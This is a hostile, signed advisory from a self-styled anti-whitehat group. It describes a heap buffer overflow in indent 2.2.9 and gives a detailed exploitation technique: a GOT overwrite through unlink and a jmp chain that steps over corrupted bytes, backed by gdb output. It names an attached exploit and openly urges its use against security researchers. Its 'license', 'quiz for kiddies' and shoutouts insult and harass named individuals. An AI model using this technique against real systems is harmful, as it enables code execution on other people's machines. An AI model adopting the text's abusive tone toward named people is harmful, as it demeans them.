-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 XXXX XX XX XXXX XX XX XXX XX XX XX XX XX XXXX XX XX XX XX XXXX XX XX XX XXX XX XX XX XXX XX XX XXX XX XX XXX XX XX XX XX XXXX XX XX XX XX XX XX X XX XX XXX XX XX XX XX XXX XX XX XXX XXXX XX XXX XXX XX XXX XXXX XXX XXXXX XX XXXXX XX XXXX XX XX XXX XXXXXXXX X XX XX.....XXXXX XX XX XX.......XXXXXXX XX XX XX XX............XXXXXXX XX XX XXX XX..X..............XXXXXX XXXXXXXXXX XXX....................XXXX XX XX........................XXXX XXXXX XX.............................XXXX..XX XX.................................XX..XX XX......................................XX XXX.......................................XX XXXX.........................................XX XXX...................X........................XX XXXXXXX...............X...........................XX XX XXXX...........XX..........................XX XX XXX.......XX............................XX XX XXX...XX..............................XX XX XXXX....XXXXXXXXXXXXXXXXXX..........XX XX XXXXXXXX XXXXXXXXXXXXXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX X XXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX X XX XX XX XXX XX X XXXX XX XXXX XX XX XX XX XXXXXX XX XX XXX XX XXXX XXX XX XX XXX XX XX XX XX XX XX XX XX XX XX XXXX XX XX XXX XX XX XXX XX XX XX XXX XX XX XXXXXXX XX XX XXX XXX XX XX XXX XXX XX XX XXX XX XXX XX XX XX XX XX XX XX XXX XX XX XX XX XX XXXXX XX XX XX XX XX XX XX XXXX XX XX XX X XX XXX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XXX XXX XX XXX XXXXX XXX XXX XXXXX . . .___.. .__ . | |*._ ._ * _ | |_ _ [__) _ _ |_ |/\||[ )[ )|(/, | [ )(/, | (_)(_)[ ) . . . __. . |__| _. _.;_/*._ _ (__ _.. . _. _|._. _ ._ | |(_](_.| \|[ )(_] .__)(_](_|(_](_][ (_)[ ) ._| | .__ , [__)._. _ __ _ ._ -+- __ * | [ (/,_) (/,[ ) | _) * Software: indent Version: 2.2.9 Vulnerability: buffer overflow while parsing .c file Found date: Aug 2002 Release date: today you stupid whitehat boy Researchers: Winnie The Pooh Hacking Squadron Favourite food: whitehat soup [0] LICENSE 1) No whitehat whore can use this in his pseudo-security work 2) divineint can't trade exploit attached to this advisory on #darknet@efnet nor other lame channel (for people who don't know it yet - his new nick is illumanti(z), is he hidding ?!) 3) Every hacker can implement exploit for this vuln in his codes to protect them from script kiddies and whitehats. 4) WtPHS strongly encourage hackers to use this against whitehats. 5) WtPHS don't give a shit if you hurt yourself [1] INTRO indent is really fucking leet tool that improves appearance of C source code. It was designed to help people reading sources written by damn stupid and unskilled programmers like You Dong-Hun or Theo the Radt. It is really helpful nowadays because of that whores who think they are coders. Unfortunatelly authors of indent also made their software vulnerable to buffer overflow. [2] DETAILS handle_token_colon(...) is vulnerable function. Buffer overflow occurs while parsing text (from .c file of korz), which indent treat like label. It copies whole 'label' to, 1000 bytes long, buffer on heap, without bounds checking. (Note for divineint-alike people: such overflow can lead to overwrite of heap stuctures and as result of this - arbitrary code execution). This is vulnerable part of handle_token_colon(...) function: for (t_ptr = s_code; *t_ptr; ++t_ptr) { *e_lab++ = *t_ptr; /* turn everything so far into a label */ } (Note for gorion(*)-alike people: this loop will copy as long as NULL byte will be find in source string) [3] EXPLOITATION This section is needed for stupid people like divineint or Lorenzo Hernandez Garcia-Hierro (Good Lord! I feel like in south-american telenovel saing his name). Smart people choose clear_buf_break_list() function to cause code execution. This function is executed just after our vulnerable loop, so we don't risk application crash. indent breaks source code and makes double-linked list (buf_break_list) of code parts. Mentioned function free()'s all buf_break_list entries. This double-linked list entries are allocated after 'labbuf' (e_lab points to labbuf) so we are able to overwrite it. Now exploitation is very easy. Overwrite free() GOT entry with and make clear_buf_break_list() loop run once again by setting 'prev' field of buf_break_st_ty struct to some readable value. Exploit for this vulnerability for indent 2.2.9 from slackware 9.0 is attached to this advisory. NOTICE!!!! QUIZ FOR KIDDIES: ----------------------------------------------------------------- - ---- This exploit have simple execve(shell) shellcode. What do you have to change to make this exploit useful ? ----------------------------------------------------------------- - ---- FIRST PERSON WHO SENDS US GOOD ANSWER WINS OpenSSH Buffer Management Vulnerability REMOTE EXPLOIT ... DON'T WAIT !! DO IT NOW! [4] EDUCATIONAL VALUE Whats educational here? One technique used in this exploit. Lets call FD = WHAT and BK = WHERE-8. People with IQ > 75 knows that unlink() will do *(WHAT+0xc)=(WHERE-8) except *((WHERE-8)+8) = WHAT. If we point WHAT to NOPs before our shellcode, unlink() will change few of our NOPs to something else. Executing this 'somethingelse' will probably crash our application. It looks like this: Before unlink(): (gdb) x/20i 0x805b440 0x805b440: nop 0x805b441: nop 0x805b442: nop 0x805b443: nop 0x805b444: nop 0x805b445: nop 0x805b446: nop 0x805b447: nop 0x805b448: nop 0x805b449: nop 0x805b44a: nop 0x805b44b: nop 0x805b44c: nop 0x805b44d: nop 0x805b44e: nop 0x805b44f: nop 0x805b450: nop 0x805b451: nop 0x805b452: nop 0x805b453: nop (gdb) x/x 0x8058dc8 0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x40019f52 After unlink(): (gdb) x/x 0x8058dc8 0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>: 0x0805b440 (gdb) x/20i 0x805b440 0x805b440: nop 0x805b441: nop 0x805b442: nop 0x805b443: nop 0x805b444: nop 0x805b445: nop 0x805b446: nop 0x805b447: nop 0x805b448: nop 0x805b449: nop 0x805b44a: nop 0x805b44b: nop 0x805b44c: rorb $0x90,0x90900805(%ebp) 0x805b453: nop 0x805b454: nop 0x805b455: nop 0x805b456: nop 0x805b457: nop 0x805b458: nop 0x805b459: nop Next call to free() will jump to 0x805b440. If execution flow will reach 0x805b44c, program will crash at this instruction. Solution is simple, however WtPHS don't remember anybody describing it before, so ... here it is: Instead of NOPs you can use relative jmp's like this: Before unlink(): (gdb) x/20i 0x805b440 0x805b440: jmp 0x805b44a 0x805b442: jmp 0x805b44c 0x805b444: jmp 0x805b44e 0x805b446: jmp 0x805b450 0x805b448: jmp 0x805b452 0x805b44a: jmp 0x805b454 0x805b44c: jmp 0x805b456 0x805b44e: jmp 0x805b458 0x805b450: jmp 0x805b45a 0x805b452: jmp 0x805b45c 0x805b454: jmp 0x805b45e 0x805b456: jmp 0x805b460 0x805b458: jmp 0x805b462 0x805b45a: jmp 0x805b464 0x805b45c: jmp 0x805b466 0x805b45e: jmp 0x805b468 0x805b460: jmp 0x805b46a 0x805b462: jmp 0x805b46c 0x805b464: jmp 0x805b46e 0x805b466: jmp 0x805b470 After unlink(): (gdb) x/10i 0x805b440 0x805b440: jmp 0x805b44a 0x805b442: jmp 0x805b44c 0x805b444: jmp 0x805b44e 0x805b446: jmp 0x805b450 0x805b448: jmp 0x805b452 0x805b44a: jmp 0x805b454 0x805b44c: rorb $0xeb,0x8eb0805(%ebp) 0x805b453: or %ch,%bl 0x805b455: or %ch,%bl 0x805b457: or %ch,%bl (gdb) x/10i 0x805b454 0x805b454: jmp 0x805b45e 0x805b456: jmp 0x805b460 0x805b458: jmp 0x805b462 0x805b45a: jmp 0x805b464 0x805b45c: jmp 0x805b466 0x805b45e: jmp 0x805b468 0x805b460: jmp 0x805b46a 0x805b462: jmp 0x805b46c 0x805b464: jmp 0x805b46e 0x805b466: jmp 0x805b470 This way we jumped over shitty instruction. These jmps will lead execution flow to our shellcode, but to be sure that no jmp will jump into middle of shellcode you have to put few (at least 8) NOPs before shellcode. Than last jmp will jump to NOPs and than shellcode will be executed properly. [5] IMPACT Possible impact is quite big. For example companies and software developers that are terrified because of their software is damn shitty (Cisco, Apache, OpenBSD, Linux Kernel first come to our mind) could implement exploit for this vuln into their source codes to make hackers life difficult. [6] FLAMES, SHOUTOUTS and FINAL NOTES *) no, divineint, you can't get our juarez - stop begging for it biatch *) no, Stefan Esser, you can't steal our juarez and public it as your own, because you are to stupid to own us. *) shoutouts to our brotherly squad - Mickey Mouse Hacking Squadron *) shoutouts to PHC for terrorizing whitehats and full-disclosure *) recent OpenSSH vulnerability is exploitable *) greetings to Lorenzo Hernandes Garcia-Hierro for making us laught on the floor while reading his posts. *) kudos to Alan Alexander Milne (R.I.P - 1956) [7] OUTRO the end... -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.3 wkYEARECAAYFAj/sM6EACgkQYE4zNxPdkhNhpACfc5C40UAJ7K8ybtvg6o6uXUzhoR0A oI+4wR01MMKbGwVqDdpjIxXRrzX7 =eC7E -----END PGP SIGNATURE-----
Attachment:
WinnieThePooh-indent-2.2.9-0day.tar.bz2
Description: BZip2 compressed data
-----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.3 wkYEABECAAYFAj/sM4cACgkQYE4zNxPdkhP/ogCfaYX9aIYezUeFOqjBszPUseYLi1EA ni8k2tyESGb/cZFrLYKYEXlKFZG4 =LiET -----END PGP SIGNATURE-----